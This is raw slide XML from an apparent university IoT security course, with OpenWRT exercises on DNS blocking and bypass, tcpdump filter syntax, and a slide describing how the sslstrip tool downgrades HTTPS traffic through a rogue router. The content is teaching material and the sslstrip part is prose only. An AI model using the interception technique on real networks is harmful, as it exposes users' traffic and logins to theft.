              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.khoury.northeastern.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> works on your phone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>create a new hostname “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.khoury.northeastern.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” in OpenWRT and set its IP to 0.0.0.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>try to access the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hint: If your system caches the DNS information and you accessed the website before, it might be still accessible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA753FA-8ABF-2C4B-A64C-D078B6F9159A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115012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817942" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hardware components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465803" y="1758651"/>
            <a:ext cx="5857568" cy="4361693"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Busses and interfaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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SPI,  I2C, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Canbus</a:t>
            </a:r>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UART, JTAG, Arm’s version of JTAG</a:t>
            </a:r>
          </a:p>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Communication stacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Ethernet</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RS485</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Bluetooth</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WIFI</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Zigbee</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35538107-68BB-5E4A-9ACD-AE37494CFCB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6584078" y="1758651"/>
            <a:ext cx="5028093" cy="43616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b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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DRAM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SRAM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ROM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(eFuses)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Raw NAND/NOR Flash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eMMC</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SD Card</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5988333-9E37-ED4E-A0A6-343BD1BB2672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2542770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115577"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exercises with OpenWRT, 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415600" y="2015067"/>
            <a:ext cx="11360800" cy="4076766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" vert="horz" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypass DNS blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Background: some IoT devices use hardcoded DNS servers and do not use the DNS server which was configured via DHCP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Check that “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.khoury.northeastern.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” is still blocked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set the DNS Server on your device to 8.8.8.8 manually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Check if “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.khoury.northeastern.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” works again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How can this be prevented?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152396" indent="0">
              <a:buNone/>
            </a:pP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46FB12-4396-6544-A98E-3B0499A6FF74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="952546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91995"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415600" y="1621299"/>
            <a:ext cx="11360800" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" vert="horz" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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eth0</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host 1.1.1.1</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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 1.1.1.1</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dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 1.0.0.1</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net 1.2.3.0/24   (particular subnet)</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-c 1 -X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (packet inspection)</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port 3389</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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> port 1025</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udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (particular protocol)</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ip6</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portrange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 21-23</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less 32  (filter on packet size)</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greater 64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;= 128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reference: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https://danielmiessler.com/study/tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B06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9A3C287C-E9BF-6646-9450-C49B632EEA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2915526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91995"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sslstrip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415600" y="1621299"/>
            <a:ext cx="11360800" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" vert="horz" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sslstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a tool that transparently hijacks HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To strip SSL, an attacker intervenes in the redirection of the HTTP to the secure HTTPS protocol and intercepts a request from the user to the server. The attacker then establishes an HTTPS connection between himself and the server, and an unsecured HTTP connection with the user, acting as a “bridge” between them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Often implemented in a router with a “common” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reference: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https://tools.kali.org/information-gathering/sslstrip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C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A3C287C-E9BF-6646-9450-C49B632EEA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1356027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91995"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dnsmasq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415600" y="1621299"/>
            <a:ext cx="11360800" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" vert="horz" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
